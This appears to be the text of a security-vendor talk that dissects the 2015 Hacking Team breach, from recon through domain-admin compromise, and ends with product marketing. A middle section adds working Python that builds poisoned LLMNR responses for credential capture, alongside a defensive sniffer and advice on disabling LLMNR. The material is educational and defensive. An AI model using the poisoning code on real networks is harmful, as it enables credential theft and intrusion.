threat dissection - alberto soliño testa research director, core security
THREAT DISSECTION
Alberto G. Solino, Director of Research, Core Security
Geek me
• Microsoft ASM first programming language (by luck)
• Started playing with MS-DOS viruses when I was 10
• Hooked into a security research group at BA University when I was 15
• Special Projects Security Group for Arg. Tax Agency
• Joined Core as security consultant
• Managed the Security Consulting Team for 11 years
• Switched to PM (Core Impact) for 5+ years
• Now Director of Research :)
Not so geek me
Piano, tennis, scuba diving and skydiving (above all). Surfing is on the to-do list.
Some big software fails and their consequences
MS08-067
MS14-068
MS10-067 + MS10-046
Hacking Team Hack
• Founded in 2003.
• Develops and sells hacking tools to governments.
• Remote Control System (a.k.a. Galileo) is their main solution.
• In July 2015, Hacking Team was hacked.
• Hacked dump available at https://github.com/hackedteam.
• Includes RCS for Linux, Android, the common backend and a set of exploits (some of them 0-day back then).
• Dumped emails available through Wikileaks at https://wikileaks.org/hackingteam/emails/.
• Full dump (~400 GB) released as a torrent.
• Hack claimed to be done by Phineas Fisher.
Hacking Team Hack – Step 1: External Recon
Initial information gathering / recon:
• Whois lookups
• OS stack fingerprinting
• Port scanning
• Web application fingerprinting
Results:
• Main website (Joomla)
• Mail / anti-spam server (Postfix)
• VPN appliances (embedded)
Hacking Team Hack – Step 2: Initial Foothold / Pivoting
Initial foothold:
• No phishing / client side
• 0-day in an embedded device
Uploaded toolkit:
• Python
• Nmap
• Responder.py
• Tcpdump
• Socat
• SOCKS proxy (proxychains)
Result: compromised machine, used as the pivot into the internal network.
Hacking Team Hack – Step 3: Internal Recon
Internal information gathering:
• Traffic analysis (with Responder)
• Slow port scan
• OS fingerprinting
Results:
• MySQL databases (patched)
• Open MongoDB without authentication (RCS audio recordings)
• iSCSI devices without authentication (used for backups)
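The "traffic analysis with Responder" step works because Windows hosts that fail a DNS lookup fall back to LLMNR (UDP 5355, multicast 224.0.0.252) and NBT-NS, and anyone on the segment may answer. Responder listens for those queries (passively in analyze mode, `-A`) and, when poisoning, answers with its own address so the victim authenticates to the attacker. The following Python is an added example written for this page, not code from the talk or from the Responder project: it decodes an LLMNR query, builds the poisoned A-record answer a poisoner would send, and includes a passive sniffer a defender can run to find hosts that still leak LLMNR. The host names and the attacker IP are placeholders; the packet bytes are constructed, not captured.

```python
"""Minimal LLMNR decoder / poisoner (added example, not from the talk)."""
import socket
import struct
from dataclasses import dataclass

LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1
FLAG_QR = 0x8000  # header flag: 1 = response, 0 = query


@dataclass
class LlmnrQuery:
    txid: int
    name: str
    qtype: int
    qclass: int


def encode_name(name: str) -> bytes:
    """DNS-style labels: length byte + label for each label, then a 0 byte."""
    labels = [lbl.encode("utf-8") for lbl in name.split(".") if lbl]
    return b"".join(bytes([len(lbl)]) + lbl for lbl in labels) + b"\x00"


def decode_name(buf: bytes, off: int) -> tuple[str, int]:
    """Decode labels at buf[off:], return (name, offset past the terminator)."""
    labels = []
    while True:
        length = buf[off]
        off += 1
        if length == 0:
            return ".".join(labels), off
        if length & 0xC0:  # compression pointers only appear in responses
            raise ValueError("compressed name not supported")
        labels.append(buf[off:off + length].decode("utf-8"))
        off += length


def parse_llmnr_query(pkt: bytes) -> LlmnrQuery:
    """Decode one LLMNR query; raise ValueError for anything else."""
    if len(pkt) < 12:
        raise ValueError("short packet")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", pkt[:12])
    if flags & FLAG_QR:
        raise ValueError("QR bit set: this is a response, not a query")
    if qdcount != 1:
        raise ValueError("LLMNR queries carry exactly one question")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return LlmnrQuery(txid, name, qtype, qclass)


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """What a client sends to 224.0.0.252:5355 when DNS lookup of name fails."""
    header = struct.pack("!6H", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def build_poisoned_answer(q: LlmnrQuery, attacker_ip: str, ttl: int = 30) -> bytes:
    """Answer the query with attacker_ip, whatever name was asked for."""
    if q.qtype != QTYPE_A:
        raise ValueError("this example only poisons A queries")
    header = struct.pack("!6H", q.txid, FLAG_QR, 1, 1, 0, 0)
    question = encode_name(q.name) + struct.pack("!HH", q.qtype, q.qclass)
    rdata = socket.inet_aton(attacker_ip)
    rr = encode_name(q.name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + rr


def answered_ip(resp: bytes) -> str:
    """Return the A record in a response: the address the victim will connect to."""
    _, off = decode_name(resp, 12)   # skip the echoed question name
    off += 4                         # qtype + qclass
    _, off = decode_name(resp, off)  # answer owner name
    _, _, _, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
    off += 10
    return socket.inet_ntoa(resp[off:off + rdlen])


def sniff_queries(count: int = 10, iface_ip: str = "0.0.0.0") -> None:
    """Passive check (needs root/admin to bind 5355): list hosts leaking LLMNR."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(iface_ip)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    for _ in range(count):
        data, (src, sport) = s.recvfrom(2048)
        try:
            q = parse_llmnr_query(data)
        except ValueError:
            continue
        print(f"{src}:{sport} asked LLMNR for {q.name!r} (qtype {q.qtype})")


if __name__ == "__main__":
    sniff_queries()
```

Every host `sniff_queries` reports is a poisoning candidate; the fix is to disable LLMNR (Group Policy "Turn off multicast name resolution") and NBT-NS on the adapters, after which the fallback traffic disappears and the attacker has nothing to answer.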
Hacking Team Hack – Step 4: Privilege Escalation / Compromised Creds
Local privilege escalation:
• iSCSI remote mount (Exchange VM backup)
• Registry hives downloaded from the mounted backup
• Registry secrets dumped offline (lsadump, creddump, secretsdump, etc.)
Result:
• Local Administrator account (besadmin) plaintext password, stored for a service
Hacking Team Hack – Step 5: RCE / Pivoting / Local IG (Creds)
Pivoting / RCE / compromising credentials:
• Log into servers using besadmin
• Install a Meterpreter agent
• Scrape memory for credentials (mimikatz)
Hacking Team Hack – Step 5b: Domain Dominance
Result:
• Domain Admin credentials
Hacking Team Hack – Step 6: Local IG / Exploit / RCE / Pivoting
Local information gathering / exploit / pivoting:
• Mounted a TrueCrypt volume
• Found a text file pointing to the Nagios server credentials
• OS command injection in web apps
• The Nagios server was connected to the source-code network
Result:
• Access to the source-code network as admin
Hacking Team Hack – Conclusions: Persistence / Data Exfiltration
Data exfiltration / persistence:
• Exfiltration method unknown (probably just TCP)
• No persistence set (Duqu style)
Results:
• All emails
• Source code for most applications
• The company's Twitter account
High level cycle of a compromise
https://blogs.technet.microsoft.com/enterprisemobility/2017/01/24/cyber-security-attackers-toolkit-what-you-need-to-know/
Core Security Solutions
Core Impact – Pentesting / Red Teaming solution
Multi-Threat Surface Investigation
Commercial-Grade Framework
Actionable, Customized Reports & Results
Security Awareness & Evidence
Vulnerability Insight - Attack Path Simulation
Identify the "attack path":
• Learn what an attacker can do to your network today
• Identify dangerous trust relationships between components
Remove false positives and less relevant vulnerabilities
Network Insight, Vulnerability Insight and Access Insight (suspected and infected host information; vulnerabilities and attack path for infected devices) feed Actionable Insight & Response (AIR).
Putting it all together